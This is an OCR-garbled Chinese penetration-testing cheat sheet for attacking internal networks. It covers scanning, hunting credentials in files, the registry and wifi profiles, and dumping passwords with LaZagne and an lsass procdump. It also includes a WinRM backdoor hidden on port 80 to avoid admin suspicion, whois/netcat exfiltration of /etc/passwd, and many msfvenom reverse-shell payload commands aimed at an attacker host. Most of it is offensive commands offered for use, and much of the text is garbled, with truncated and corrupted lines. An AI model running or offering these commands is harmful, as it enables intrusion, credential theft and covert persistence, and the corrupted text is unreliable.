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和 。 还 有 一 种 方法 就 是 可 以 在 网 段 中 扫描 开放 389 端 口 ， 389 是 LDAP 协议 端口 ， 一 般 域 控 都 会 开 


-— 如 


的 à 


内 网 无 工具 扫描 


e5/112/ 一 条 cmd 命令 解决 : 







http://rinige.com/ 


or /1 %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl" 


用 | 


Wor /1 %i in (1,1,255) do @ping -a 10.0.1.Xi -w 1 -n 1 | find /i "Ping" 





| 把 net view 的 结果 ， 挨 个 ping 一 遍 ， 并 输出 机 器 名 和 ip 地 址 。 


Leobalstrike 下 可 以 用 portscan 模 块 (会 先 探测 存活 主机 ， 存活 的 主机 才 开 始 端口 扫描 ): 
”cobalstrike 下 导入 powershell 模 块 扫描 : 


”msf 下 端口 扫描 : 


添加 路 由 
run autoroute -s 192.168.3.1 -n 255.255.255.0 


use auxiliary/scanner/portscan/tcp 


也 可 代理 出 来 配合 其 他 扫描 器 。 


0x03 文件 定位 


内 网 信息 收集 
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FOR /F "eol-- tokens-i delims- " %a IN (‘net view') DO Q(echo name: Xa, ip: & pi 


beacon> portscan 192.168.4.0/24 445,3389,1433,22,6379,389,53,7001,1099,8080,80 i 


beacon» powershell-import /home/PowerSploit-master/Recon/Invoke-PortScan.psi bee 


1. mstscid & 
è cat * ” ? 


cmdkey /list #mstscic® 


1. 常见 敏感 文件 名 


web.conf , web.conf.bak , connection.php , db mysgl.inc, dbconfig.php , dbconfic 


windows: 
eli D/S XXX XO 
findstt-/c: Userz! /c:"user" /Cc pass Voi ripa ani 7. txt "CONF *.as* «php 


FInGsSty ys /i “backup =s 
linux: 
find / -name "conifg.*" 


find ./ -name "*.php" | xargs egrep -i "user|pass|mysgl|config" 
cat /root/.bash history 


1. 注册 表 搜 索 


# reg query HKLM /f password /t REG SZ /s 搜集 注册 表 中 的 各 种 密码 数据 # 
reg query HKLM /f username /t REG SZ /s 搜集 注册 表 中 的 各 种 账号 数据 


1. wifi 信息 导出 


netsh wlan export profile interface= 无 线 网 络 连接 key-clear folder=C: fuck # 导 出 无 


1. lazagne 导 出 电脑 记录 密码 (包括 浏览 器 、git、svn、wifi、 数 据 库 等 ) 
直接 lazagne.exe all 导 出 全 部 
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r- B. Slog = = | > lazagne.exe 
isage: lazagne.exe [-h] [-version] 
<chats.mails,all.git-sun_windows wif i.maven.sysadmin, browsers 
_ganes,mult imedia,memory,datahases . php? 


The LaZagne Project 


? BANG BANG ? 


positional arguments? 
{chats,mails,all,git,sun_,windous,wifi-maven,sysadmin,.browsers,games,multinedia 
.nenory, databases. php? 

Choose a main command 
chats Run chats module 
mails Run mails nodule 
all Run all modules 
git Run git module 
sun Run svn module 
windows Run windows module 
wifi Run wifi module 
maven Run maven module 
sysadmin Run sysadmin module 
browsers Run browsers module 
games Run games module 
multimedia Run multimedia module 
memory Run memory module 
databases Run databases module 
php Run php module 


optional arguments: 
~h. ~~help show this help message and exi 
-version laZagne version 
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BIER: CAWindows\system32\cmd.exe - lazagne.exe all WaS iru] 


08 66 37 66 BƏ BB BA BB BB HA 76 HA 70 GE GE G0 ..7....... : 
75 00 73 BB 65 08 70.80 6E 08 u.S.€.r...U.p.n. 
?5 80 73 66 65 BB 38 88 21 00 u.s.e.r.8.8.8.*f. 
40 66 23 80 BO BA 66 66 66 OB «= G.8.....0....... 








Default Password 
BAA 66 66 08 66 0O 0A 00. 00.00 DU. rose I So ILE 
0018 B6 66 GA A? F2 GC 360.BR7:09-68 ^ |. £5 ER Ls uo | 


HEEL UI User: itii it 


: https://raci .» 


ogin: 15 
assword: cq^ 





RL: http://w a 
"FER | 
assword: 


数据 库 中 收集 有 价值 的 密码 (from klion) : 


mysql» select table schema as db,table name as tables,column name as columns frc 


mssql» SELECT TABLE CATALOG, TABLE NAME, COLUMN NAME FROM INFORMATION SCHEMA.COLUM 


LÀ 


极限 条 件 下 端口 复 用 


isk: 可 以 参考 这 篇 : 一 条 命令 实现 端口 复 用 后 门 


1. 在 Windows 2012 以 上 的 服务 器 操作 系统 中 ，WinRM 服 务 默认 启动 并 监听 了 5985 端 口 

2. 对 于 Windows 2008 来 说 ， 需 要 使 用 命令 来 启动 WinRM 服 务 ， 快 速配 置 和 启动 的 命令 是 winrm 
quickconfig -q， 这 条 命令 运行 后 会 自动 添加 防火 墙 例外 规则 ， 放 行 53985 端 口 

3. 对 于 原本 就 开放 了 WinRM 服 务 的 机 器 来 讲 ， 需 要 保留 原本 的 5985 端 口 listener， 同 时 需要 新 增 
一 个 80 端 口 的 listener， 这 样 既 能 保证 原来 的 5985 端 口 管理 员 可 以 使 用 ， 我 们 也 能 通过 80 端 口 
连接 WinRM。 使 用 下 面 这 条 命令 即 可 新 增 一 个 80 端 口 的 listener 
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winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} 


Mee $ $ D 


4. f£ Windows 2008 上 面 如 果 原 本 没有 开启 WinRM 服 务 ， CARENE E SEE web 
” 服务 端口 80， 否 则 管理 员 上 来 看 到 一 个 5985 端 口 就 可 能 起 疑心 。 通 过 下 面 这 条 命令 即 可 修改 端 
口 为 80 


winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"} 


“14. 本 地 配置 后 使 用 后 门 : 本 地 需要 连接 WinRM 服 务 时 ， 首 先 也 需要 配置 启动 WinRM 服 务 ， 然 后 
需要 设置 信任 连接 的 主机 ， 执 行 以 下 两 条 命令 即 可 。 winrm quickconfig -q winrm set 
winrm/config/Client doncc 连接 使 用 使 用 winrs 命 令 即 可 连接 远程 WinRM 服 务 执 
行 命令 ， 并 返回 结果 winrs -rnhtpyAwwwpaiducom -uadministrator -p:PasswOrd whoami 


上 上 述 命令 会 在 远程 机 器 上 执行 Whoami 命 令 ， 获 取 结 果 后 直接 退出 。 常规 


Njianshy.com/p/9df5e6e62246 渗透 技巧 -- 通 过 cmd 上 传 文件 的 N 种 方法 
e hitps://xz .com/t/1649 渗透 技巧 一 一 从 github 下 载 文 件 的 多 种 方法 
e https://3gstud github.io/3gstudent.github.io/96E 69688949 796E 99680968F96E 696B5968B96E 8 


til exe/ 渗透 测试 中 的 certutil.exe 
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内 网 渗透 中 的 文件 传输 第 一 季 
内 网 渗透 中 的 文件 传输 第 一 季 


利用 whois 传 输 文件 : 
。 传输 机 : 

root@john:~# whois -h 127.0.0.1 -p 4444 cat /etc/passwd | base64 
。 接受 机 : 


root@john:/tmp# nc -| -v -p 4444 | sed "s/ //g" | base64 -d 
£ vp 


root@john: /tmp# nc -l -v -p 4444 | sed "s/ //g" | base64 -d 
listening on [any] 4444 ... 





root@john: /tmp# nc -l -v -p 4444 

listening on [any] 4444... 

connect to [127.0.0.1] from localhost [127.0.0.1] 573 
root: eae 439B 


+ frten fohin. far 
'leon1n 
60 Sm 


| (hans /hanevne 


ss gin 


9." rnyv; fbin: /usr/sbin/nologin 





优点 ; 适用 于 隐蔽 传输 。 最 小 化 被 发 现 。 
缺点 : 适用 于 传输 小 文件 。 


后 者 的 话 : whois 是 否 同样 适用 于 payload 的 反弹 ， 是 一 个 非常 有 趣 的 实验 。 
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sfvenom 常 用 生成 payload 命 令 o 
msfvenom 常 用 生成 payload 命 令 
windows: 


msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse tcp LHOST= 攻 击 ; 


D. fe > 


msfvenom -a x86 --platform osx -p osx/x86/shell reverse tcp LHOST= 攻 击 机 IP LPORT= 


"P > 


android: 


// 需 要 签名 


msfvenom -a x86 --platform Android -p android/meterpreter/reverse tcp LHOST= 攻 击 ; 


4 > 


- powershell: 


msfvenom -a x86 --platform Windows -p windows/powershell reverse tcp LHOST= 攻 击 机 


4 > 


linux: 


msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse tcp LHOST= 攻 击 ; 


> 
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* > 


* vernal ! » 
msfvenom -p php/meterpreter reverse tcp LHOST-«Your IP Address» LPORT-«Your Port 


cat shell.php | pbcopy && echo '<?php ' | tr -d ' 
' » shell.php && pbpaste »» shell.php 


aspx: 


msfvenom -a x86 --platform windows -p windows/meterpreter/reverse tcp LHOST= 攻 击 ; 


jsp: 


msfvenom --platform java -p java/jsp shell reverse tcp LHOST= 攻 击 机 IP LPORT= 攻 击 机 


4 " í » 


War: 


msfvenom -p java/jsp shell reverse tcp LHOST= 攻 击 机 IP LPORT= 攻 击 机 端口 -f raw -o pi 


> 


nodejs: 


msfvenom -p nodejs/shell reverse tcp LHOST= 攻 击 机 IP LPORT= 攻 击 机 端口 -f raw -o pay: 


«i > 


python: 


msfvenom -p python/meterpreter/reverse tcp LHOST= 攻 击 机 ITP LPORT= 攻 击 机 端口 -f raw ， 


> 


perl: 
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_ msfvenom -p cmd/unix/reverse perl LHOST= 攻 击 机 IP LPORT= 玫 击 机 端 回 -f raw -0 payloac 


Ma > 







ruby: 


msfvenom -p ruby/shell reverse tcp LHOST= 攻 击 机 IP LPORT= 攻 击 机 端口 -f raw -o paylo: 


E > 


msfvenom -p cmd/unix/reverse lua LHOST= 攻 击 机 IP LPORT= 攻 击 机 端口 -f raw -o payload 


4 > 


windows shellcode: 


msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse tcp LHOST= 攻 击 ; 


4 b 


- linux shellcode: 


| msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse tcp LHOST= 攻 击 ; 


4 > 


mac shellcode: 


-———— —— = 


msfvenom -a x86 --platform osx -p osx/x86/shell reverse tcp LHOST= 攻 击 机 IP LPORT- 


> 


便捷 化 payload 生 成 : 


项 目地 址 : https://github.c 
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root@John:~/Desktop# git clone https://github.com/Screetsec/TheFatRat.git 


// 设 置 时 需要 挂 墙 


(John: -/Desktop# git clone https: //github. com/Screetsec/TheFatRat.git 
Cloning into ‘TheFatRat'... 

remote; Counting objects: 13531, done. 

remote; Compressing objects: 100% (3/3), done. 

remote: Total 13531 (delta 0}, reused © (delta 0), pack-reused 13528 
Receiving objects: 100% (13531/13531), 261.75 MiB | 246.00 KiB/s, done. 
Resolving deltas: 100% (4971/4971), done. 

Checking out files: 100% (9891/9891), done. 


i esktop/TheFatRats chmod 4 
esktop/TheFatRat# chmod +x powerfull.sh 


/Desktop/TheFatRats chmod + 
ihn: -/Desktop/TheFatRats ./setup. 


Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

The following packages were automatically installed and are no longer required: 
osslsigncode python-capstone 

Use 'sudo apt autoremove' to remove them. 

Q upgraded, O newly installed, O to remove and 1561 not upgraded. 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

The following packages will be REMOVED: 
asslsigncode python-capstone 

OQ upgraded, O newly installed, 2 to remove and 1561 not upgraded. 

After this operation, 299 kB disk space will be freed. 

(Reading database ... 358213 files and directories currently installed.) 

Removing osslsigncode (1.7.1-2) ... 

Removing python-capstone (3.0.4-3) ... 
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\(@) (@) (@) (@) (@) (@) (@)/ 


LINUX >> FatRat.elf 
WINDOWS >> FatRat.exe 
ANDROID >> FatRat .apk 
MAC FatRat .macho 
PHP FatRat.php 
ASP FatRat.asp 
[7] JSP FatRat.jsp 
[8] WAR FatRat.war 
[9] Python >> FatRat.py 
[10] Bash >> FatRat.sh 
[11] Perl >> FatRat.pl 
[12] Back to Menu 


Creator$FATRAT:>> [| 





附录 : 
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中 文 使 用 说 明 : 
Options: 

-p, --payload «payload» ”使 用 指定 的 payload 
--payload-options 列 出 该 payload 参 数 

-l, --list [type] 列 出 所 有 的 payloads 

-n, --nopsled «length» 为 payload 指 定 一 个 nopsled KE 

=f, --format <format> 指定 payload 生 成 格式 
--help-formats 查看 所 有 支持 格式 

-e, --encoder <encoder> 使 用 编码 器 

-a, --arch <arch> 指定 payload 构 架 
--platform «platform» ”指定 payload 平 台 
--help-platforms 显示 支持 的 平台 

=S, <=Space «length» 设 定 payload 攻 击 荷载 的 最 大 长 度 
--encoder-space «length» The maximum size of the encoded payload (de 

-b, --bad-chars «list» 指定 bad-chars 40: 'xooxff' 

-i, --iterations «count» 指定 编码 次 数 

-c, --add-code <path> 指定 个 win32 shellcode 文件 

-X, --template «path» 指定 一 个 executable 文件 作为 模板 

-k, --keep payload 自 动 分 离 并 注入 到 新 的 进程 

-0, --out «path» 存放 生成 的 payload 

-v, --var-name <name> 指定 自 定 义 变量 
--smallest Generate the smallest possible payload 

-h, --help 显示 帮助 文件 
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windows 环 境 压缩 文件 & 文 件 夹 命令 合集 “ 


前 言 


在 渗透 测试 、 红 队 评 估 、 护 网 等 项 目 中 ， 通 常会 打包 一 些 目标 主机 上 的 信息 文件 (进行 信息 收 

| 集 )、 内 存 dump 文 件 (明文 密码 获取 等 )、 网 站 代码 (代码 审计 )、 数 据 库 备份 文件 (信息 收集 、 非 脱 库 ) 
1 等， 如 果 这 些 文件 比较 大 ， 直 接 下 载 一 方面 可 能 会 长 时 间 占 用 目标 主机 大 量 带 宽 ， 造 成 目标 业务 受 
影响， 另 一 方面 可 能 会 触发 目标 方 安全 检测 设备 报警 ， 所 以 需要 把 文件 压缩 后 再 进行 下 载 ; 或 如 果 
”需要 下 载 的 文件 较 多 ， 不 可 能 一 个 个 点 击 下 载 ， 所 以 需要 打包 后 统一 下 载 。 ”本 篇 文章 会 介绍 几 种 
”常用 的 windows 打 包 、 压 缩 文 件 & 文 件 夹 的 方法 。 


压缩 工具 winrar 


© winrar(https://www.rarlab.com)Ewin.rar GmbH 开发 并 发 行 ， 现 已 正式 向 国内 个 人 用 户 免费 使 
”用 。 ”winrar 的 官方 命令 解释 如 下 。 压 缩 、 解 压 都 可 以 用 一 个 exe 完 成 。 
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RAR = desse ; * ? 
用 法 : rar <command> -<switch 1> -<switch N> <archive> <files...> 


«Qlistfiles...» <path_to_extract\> 


«Commands» 
a 添加 文件 到 压缩 文档 
c 添加 添加 压缩 文档 注释 
ch 更 改 压 缩 文档 参数 
cw 写 入 压缩 文档 注释 到 文件 
d 从 压缩 文档 删除 文件 
e 提取 文件 不 带 压缩 路 径 
f 刷新 压缩 文档 中 的 文件 
i[par]e«str» 在 压缩 文档 里 查找 字符 串 
k 锁定 压缩 文档 
l[t[a], b] 列 出 压缩 文档 内 容 [technical[all], bare] 
m[f] 移动 到 压缩 文档 [ 仅 文 件 ] 
p 打印 文件 到 stdout 
r 修复 压缩 文档 
rc 重新 构建 丢失 的 卷 
rn 重 命名 归档 的 文件 
rr[N] 添加 数据 恢复 记录 
rv[N] 创建 恢复 卷 
s[name|-] 转换 压缩 文档 到 或 从 SFX 
t 测试 压缩 文档 的 文件 
u 更 新 压缩 文档 中 的 文件 
v[t[a],b] 详细 列 出 压缩 文档 的 内 容 [technical[all],bare] 
X 解压 文件 带 完整 路 径 
«Switches» 
LE 停止 参数 扫描 
@[+] 禁用 [enable] 文件 列表 
ac 压缩 或 解压 后 清除 压缩 文档 属性 
ad 扩展 压缩 文档 名 称 到 目标 路 径 
ag[format] 使 用 当前 日 期 生成 压缩 文档 名 称 
ai 忽略 文件 属性 
ao 添加 文件 带 有 压缩 文档 属性 集 
ap<path> 设置 压缩 文档 内 部 的 路 径 
as 同步 压缩 文档 内 容 
cs 禁用 内 容 显示 
cfg- 禁用 读 取 配 置 
cl 转换 名 称 为 小 写 
cu 转换 名 称 为 大 写 
df 压缩 后 删除 文件 
dh 打开 共享 的 文件 
dr 删除 文件 到 回收 站 
ds 为 固 实 讨 缩 禁 用 名 称 排序 
dw 压缩 后 删除 文件 


e[+]<attr> 设置 文件 排除 和 包含 属性 
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不 要 添加 空 目录 

不 要 放置 'end of archive' 块 
从 名 称 里 排除 路 径 

从 名 称 里 排除 根 目录 

扩展 路 径 为 完整 路 径 

扩展 路 径 为 完整 路 径 包 括 驱 动 器 盘 符 
刷新 文件 

用 hp[password] “加密 文件 数据 及 文件 头 

| ht[b|c] 设置 哈 希 类 型 [BLAKE2,CRC32] 用 于 文件 校 验 和 
id[c,d,p,q] ZANE 

| ”ieml[addr] ”通过 电邮 发 送 压缩 文档 





I ierr 发 送 所 有 压缩 文档 到 stderr 
ilog[name] 记录 错误 日 志 到 文件 
E. inu 禁用 所 有 消息 
ioff[n] 完成 一 个 操作 后 关闭 电脑 
isnd[-] 控制 通知 声音 
4 iver 仅 显 示 版 本 号 
锁定 压缩 文档 
B kb 保留 损坏 的 已 解压 文件 
log[f][zname] 将 名 称 写 入 日 志文 件 
1 m«0..5» 设置 压缩 等 级 (0-store...3-default...5-maximal) 
M marais] 指定 压缩 格式 的 版 本 
| mc«par» 设置 高 级 压缩 参数 


i md<n>[k,m,g] 词典 大 小 单位 为 KB, MB 或 GB 
ms[ext;ext] ”指定 要 存储 的 文件 类 型 

i mt<threads> ”设置 线程 六 

i n<file> 额外 管理 器 包含 文件 


n@ 从 stdin 读 取 额外 的 过 滤器 掩 码 
n@<list> 从 列表 文件 读 取 额 外 的 过 滤器 掩 码 
o[+|-] 设置 覆盖 模式 

| oc 设置 NTFS 压缩 属性 

q oh 保存 硬 链接 为 链接 而 不 是 文件 

| oi[0-4][:min] 将 相同 的 文件 保存 为 参考 

ol[a] 将 符号 链接 处 理 为 链接 [absolute paths] 

| oni 允许 潜在 的 不 兼容 名 称 

| or 自动 重 命 名 文件 

| os 保存 NTFS 流 

| OW 保存 或 恢复 文件 拥有 者 和 组 

p[password] ”设置 密码 

| p- 不 要 查询 密码 

J qo[-|+] 添加 快速 打开 信息 [none| force] 

i r 递归 子 目录 

r- 禁用 递归 

| ro 递归 子 目录 仅 用 于 通配符 名 称 

| ri«P»[:«S»] ”设置 优先 级 (0- 默 认 ,1- 最 小 .15- 最 大 ) 和 休眠 时 间 单 位 为 ms 

l rrfN] 添加 数据 恢复 记录 

| rv[N] 创建 恢复 郑 


s[<N>,v[-],e] 创建 固 实 压缩 文档 
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s- 禁用 固 实 压 缩 文档 


sc<chr>[obj] 指定 字符 集 We : E EST 
sfx[name] 创建 SEX 压缩 文档 

si[name] 从 标准 输入 读 取 数 据 (stdin) 

SI<size> 处 理 小 于 指定 大 小 的 文件 

sm<size> 处 理 大 于 指定 大 小 的 文件 

t 压缩 后 测试 


ta[mcao]«d» ”处 理 那 些 在 日 期 «d» YYYYMMDDHHMMSS 之 后 修改 过 的 文件 
tb[mcao]«d» ”处 理 那些 在 日 期 «d» YYYYMMDDHHMMSS 之 前 修改 过 的 文件 
tk 保留 原来 的 压缩 时 间 

tl 设置 压缩 时 间 为 最 近 的 文件 

tn[mcao]«t» ”处理 那些 时 间 比 «t» 更 新 的 文件 

to[mcao]«t» ”处 理 那 些 时 间 比 «t» 更 老 的 文件 

ts[m,c,a] 保存 或 恢复 文件 时 间 (修改 日 期 ， 创 建 日 期 ， 访 问 日 期 ) 


u 更 新 文件 

v«size»[k,b] 创建 卷 大 小 为 =<size>*1000 [*1024, *1] 
vd 创建 卷 之 前 删除 磁盘 内 容 

ver[n] 文件 版 本 控制 

vn 使 用 旧式 的 卷 命名 规则 

vp 每 个 卷 之 前 暂停 

w<path> 旨 定 工作 目录 

x«file» 排除 特定 文件 

xQ 读 取 文 件 名 以 便 从 stdin 排除 
xQ«list» 排除 在 特定 列表 文件 里 列 出 的 文件 
y 对 所 有 问题 回答 是 

z[file] 从 文件 读 取 压 缩 文档 注释 


实际 使 用 情况 ， 直 接 把 winrar.exe 上 传 至 目标 机 即 可 ，winrar 大 约 400k。 ”常用 压缩 命令 为 


C:\RECYCLER\Winrar.exe a -k -r -s -m5 tmp.rar srcdir 


常用 解压 命令 为 


c:\RECYCLER\Winrar.exe x -t -o -p d:\web.rar d:\desdir 
desdir 文 件 夹 需 存 在 


或 者 压缩 文件 夹 时 ， 需 排除 某 些 文件 夹 ， 不 压缩 上 面 -x 后 面 的 文件 夹 内 文件 ， 文 件 夹 名 有 空格 需 
用 双 引 号 引起 来 ， 命 令 如 下 





win.exe a -k -r -s -m5 -x*desdir\excludedir1\* -x*desdir\"excludedir2 new"N* -x* 


> 


压缩 工具 7za 


7zip(https:/www.7-zip.orgy)，7zaexe 压 缩 命令 支持 Windows 通 配 符 *、2? 官方 使 用 命令 如 下 
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Usage: 7za «command» [<switches>...] «archive name» [«file names»...] 
: : bald 六 X 
[<@listfiles...>] 


<Commands> 
a: Add files to archive 
: Benchmark 
: Delete files from archive 


b 
d 
e: Extract files from archive (without using directory names) 
l: List contents of archive 
t: Test integrity of archive 
u: Update files to archive 

x: eXtract files with full paths 
<Switches> 

-ai[r[-|0]]{@listfile|!wildcard}: Include archives 

-ax[r[-|0]]{@listfile|!wildcard}: eXclude archives 

-bd: Disable percentage indicator 

-ifr[-|0]]{@listfile|!wildcard}: Include filenames 

-m{Parameters}: set compression Method 

-o{Directory}: set Output directory 

-p{Password}: set Password 

-r[-|0]: Recurse subdirectories 

-SCS(UTF-8 | WIN | DOS}: set charset for list files 

-sfx[{name}]: Create SFX archive 

-si[{name}]: read data from stdin 

-slt: show technical information for 1 (List) command 

-SO: write data to stdout 

-ssc[-]: set sensitive case mode 

-ssw: compress shared files 

-t{Type}: Set type of archive 

-v(Size)[b|k|m|g]: Create volumes 

-u[-l[p&] [as] [r4] [x#] [y#] [z&] [1newArchiveName]: Update options 

-w[{path}]: assign Work directory. Empty path means a temporary directory 
| -x[r[-]0]]](01istfile|!wildcard): eXclude filenames 
-y: assume Yes on all queries 





7za 常 用 命令 ” 查看 压缩 文件 内 容 (如 判断 目标 机 上 压缩 文件 是 否 有 价值 ) 


7za l target.zip 


常用 压缩 命令 如 下 ”按照 默认 压缩 类 型 进行 压缩 ，7za 会 自动 遍历 所 压缩 文件 夹 内 的 子 文件 、 子 
文件 夹 ， 默 认 压缩 类 型 为 7z 即 参数 -a -t7z ， 其 中 -mx9 为 7z 模 式 中 Ultra compressing。 


7za a -mx=9 archivel.zip test 
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7z 模 式 压缩 等 级 如 下 表 。 | Level | Description] | — | — | | 0 | No compression.| | 1 | Fastest 
compressing | | 3 | Fast compressing] | 5 | Normal compressing | | 7 | Maximum compressing| [9| 
Ultra compressing | 


如 果 需 要 使 用 其 他 压缩 类 型 > 如 zip。 


7za a -tzip archivei.zip test 


常用 解压 缩 命令 如 下 ，tool 文 件 夹 7za 自 动 创建 。 


7za x tmp.7z c:\windows\temp\tool 


或 者 压缩 文件 、 文 件 夹 时 ， 需 排除 某 些 文件 夹 ， 不 压缩 上 面 -x 后 面 的 文件 夹 内 文件 ， 文 件 夹 名 有 
空格 需 用 双 引 号 引起 来 ， 命 令 如 下 


排除 文件 


7za a archivei.zip test -x!treeNMS-1.7.4.zip 


排除 文件 夹 


7Za a archivei.zip test -xr!serverbak 


使 用 windows 自 带 压 缩 文件 命令 
makecab 压 缩 文件 命令 


makecab 可 压缩 单个 文件 或 多 个 文件 ， 但 无 法 压缩 文 件 夹 “压缩 单个 文件 命令 为 


makecab 1.txt 1.zip 


压缩 多 个 文件 需 把 要 压缩 的 文件 名 放 入 一 个 文本 文件 中 。 ”遍历 文件 夹 下 所 有 文件 bat 脚 本 如 
下 。 


@echo off 

set work_path=D:\ 安 恒 \gitbook\ 压 缩 测 试 
D: 

cd %work_path% 

for /R %%s in (,*) do ( 

echo "%%s" 

) 


pause 
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Ufile txt, AAA 


d * " ^ 


由 "p: NEIBNgitbookVEZBilliiNtestNhandshake 00 F0-B4-29-58-A2-40 2018-07-14T15-16-38. 
”WD:\ 安 恒 \gitbook\ 压 缩 测试 \test\iNode Client.7z" 


m > 


” 采用 mszip 类 型 压缩 ， 压 缩 比例 21( 最 大 )， 单 个 文件 最 大 10G( 所 压缩 文件 小 于 10G 时 只 产生 一 个 文 
Li 件 ， 不 分 包 )， 保 存 目录 为 dd*( 压 缩 文 件 小 于 10G， 只 产生 dd1 一 个 文件 夹 )， 保 存 文件 名 为 
test.cab( 压 缩 文 件 小 于 10G， 只 产生 test1.cab 一 个 文件 夹 ) 


D makecab /f file.txt /d compressiontype-mszip /d compressionmemory=21 /d maxdisks 


AN [4 
P 


| expand 解 压缩 命令 


解压 缩 test1.cab 至 c:\windows\temp\tool 目 录 ，tool 目 录 必须 存在 


expand D:;\ 安 恒 \gitbook\ 压 缩 测试 \ddi\testi.cab -f:* c:\windows\temp\tool 


D. 
| 


| zip.vbs 


” windows 文 件 管理 器 自 带 压缩 、 解 压缩 功能 (zipped)， 属 于 explorer 的 功能 ， 无 法 命令 行 调用 ， 具 
国体 介绍 传送 门 (h COM 接 口 从 


et OO fin LAA COR sin €rirtar Y be Bk» im ben 
js //filext.com/fag/compressed. 2 Ip folder.html) ; lC A zip.vbs 









”Zip.vbs 内 容 为 
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' Get command-line arguments. 
Set objArgs = WScript.Arguments 
Set FS - CreateObject("Scripting.FileSystemObject") 
InputFolder - FS.GetAbsolutePathName(objArgs(0)) 
ZipFile - FS.GetAbsolutePathName(objArgs(1)) 


Beet $ * 


' Create an empty ZIP file. 
CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile, True).Write " 


Set objShell = CreateObject("Shell.Application") 

Set source - objShell.NameSpace(InputFolder).Items 
objShell.NameSpace(ZipFile).CopyHere(source) 

' Required to let the ZIP command execute 

' If this script randomly fails or the ZIP file is not complete, 


' just increase to more than 2 seconds 
wScript.Sleep 2000 


压缩 文件 命令 为 


CScript zip.vbs C:Ntest C:\target.zip 


powershell 压 缩 文件 夹 


使 用 powershell 压 缩 文 件 、 文 件 夹 ”命令 如 下 


powershell Compress-Archive -Path D:\ 安 恒 \gitbook\ 压 缩 测试 \test -DestinationPath C 


> 
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Windows net 命令 集 使 用 


net use 


| 功能 : 连接 计算 机 或 断 开 计算 机 与 共享 资源 的 连接 ， 或 显示 计算 机 的 连接 信息 。 


该 命令 也 控制 永久 网 络 连 接 。 简介 : 建立 ipc 连 接 以 后 ， 就 可 以 访问 目标 机 器 的 文件 (上 传 、 下 

- 载 ) ， 也 可 以 在 目标 机 器 上 运行 命令 。 上 传 和 下 载 文件 直接 通过 copy 命 令 就 可 以 ， 不 过 路 径 换 成 
”UNC 路 径 。 何 为 UNC 路 径 ? 简单 来 讲 以 \ 开 头 的 路 径 就 是 UNC 路 径 ， 比 如 \192.168.1.2\c$\boot.ini。 
”如果 要 从 本 地 当前 目录 上 传 1.bat 到 192.168.1.2 机 器 C 盘 根 目 录 下 ， 那 么 命令 就 是 copy 1.bat 

- M92.168.1.AC 9, 反之 就 是 下 载 。dir、copy、xcopy、move、type 的 参数 都 可 以 使 用 UNC 路 径 。 


指令 : 


net use \\IPAddress /user:domainNusername password 建立 连接 
net use 查看 网 络 连接 列表 
net use \\ip 建立 空 连接 ， 空 账号 密码 连接 


net use \\ip /u:username password 


net use \\ip\ipc$ pawword /user:username 建立 IPC 会 话 
E use NN .16.16.2\IPC$ "k78m90" /user:admintitrator f 
let use NN172.16,16.2NIPC$ "k78m90" /user:aABIMAQNAdministrator 例子 2 ( 域 ) 
et use * /del /yes 删除 全 部 连接 
et use f: \\GHQ\TEMP 将 \\GHQ\TEMP 目 录 建 立 为 F 盘 
use f: \GHQ\TEMP /delete 断 开 连接 


use f: /de /y 


share 查看 SMB 指 向 的 路 径 [ 即 共享 ] 


指令 +UNC 路 径 


。 dir + UNC 路 径 cmd C:\Users\user>dir \x.x.x.x\C$ 硬盘 \x.x.x.x\C$ 中 的 磁 碟 没有 标 纵 。 硬盘 
序号 : xxxx-xxx V.X.X.XAC$ BS EL ÎR 
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2005/11/03 F4F 03:38 
a P . 9 


wmpub 3 个 档案 94,720 位 元 组 10 (E EI $& 25,244,045,312 位 元 组 可 用 


copy 1.bat \x.x.x.x\C$ 将 本 地 的 1.bat 文 件 上 传 到 x.x.x.x 机 子 的 C 盘 目录 下 
C:\Users\user\Desktop>copy 1.bat \x.x.x.x\C$ 


C:\Users\user\Desktop>dir \x.x.x.x\C$ 硬盘 \x.x.x.x\C$ FRAIRS BIB. 硬盘 序号 : xxxx-xxxx 
\X.X.X.X\C$ BSEI$€ 2018/06/29 FF 11:40 


1 2018/06/29 FF 10:48 79 1.bat 


copy \x.x.x.x\C$\1.bat ci\ 将 目标 机 子 C 盘 下 的 1.bat 下 载 到 本 地 C 盘 目录 下 
C:\Users\user\Desktop>copy \x.x.x.x\C$\1.bat CA #827 1 个 档案 。 


- type + UNC 路 径 查看 目标 机 子 的 文件 
”cmd 


C:\Users\user\Desktop>type \\x\.x\.x\.x\C$\1. bat 
@echo off 
C:\1\procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp 


如 果 磁 盘 映 射 不 出 来 ， 只 能 在 菜刀 里 查看 。 那 么 可 以 用 命令 dir /s /A >> c:\tempifile.txt 将 当前 目录 
下 的 所 有 目录 和 文件 输出 到 file.txt 文 件 里 。 然 后 在 file.txt 文 件 里 分 析 自 己 想 要 的 内 容 。 


net use 硬盘 挂 载 
将 目标 机 器 c 盘 挂 载 到 本 地 z 盘 


net use z: \\IP\c$ 


net use 错 误 代 码 


。 错误 号 5， 拒 绝 访问 : 很 可 能 你 使 用 的 用 户 不 是 管理 员 权限 的 ， 先 提升 权限 ; 

。 错误 号 51，Windows 无 法 找到 网 络 路 径 : 网 络 有 问题 ; 

。 错误 号 53， 找 不 到 网 络 路 径 : ip 地 址 错误 ; 目标 未 开机 ; 目标 lanmanserver 服 务 未 启动 ; 目标 
有 防火 墙 (端口 过 滤 ) ; 

。 错误 号 67， 找 不 到 网 络 名 : 你 的 lanmanworkstation 服 务 未 启动 或 者 目标 删除 了 ipc$; 

。 错误 号 1219， 提 供 的 凭据 与 已 存在 的 凭据 集 冲突 : 你 已 经 和 对 方 建立 了 一 个 ijpc$， 请 删除 再 


连 ; 
。 错误 号 1326， 原因 很 明显 了 ; 
。 错误 号 1792， 试 图 登录 ， 但 是 网 络 登录 服务 没有 启动 : 目标 NetLogon 服 务 未 启动 ; 


。 错误 号 2242， enel cup. 目标 有 帐号 策略 ， 强 制定 期 要 求 更 改 密码 
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net group 


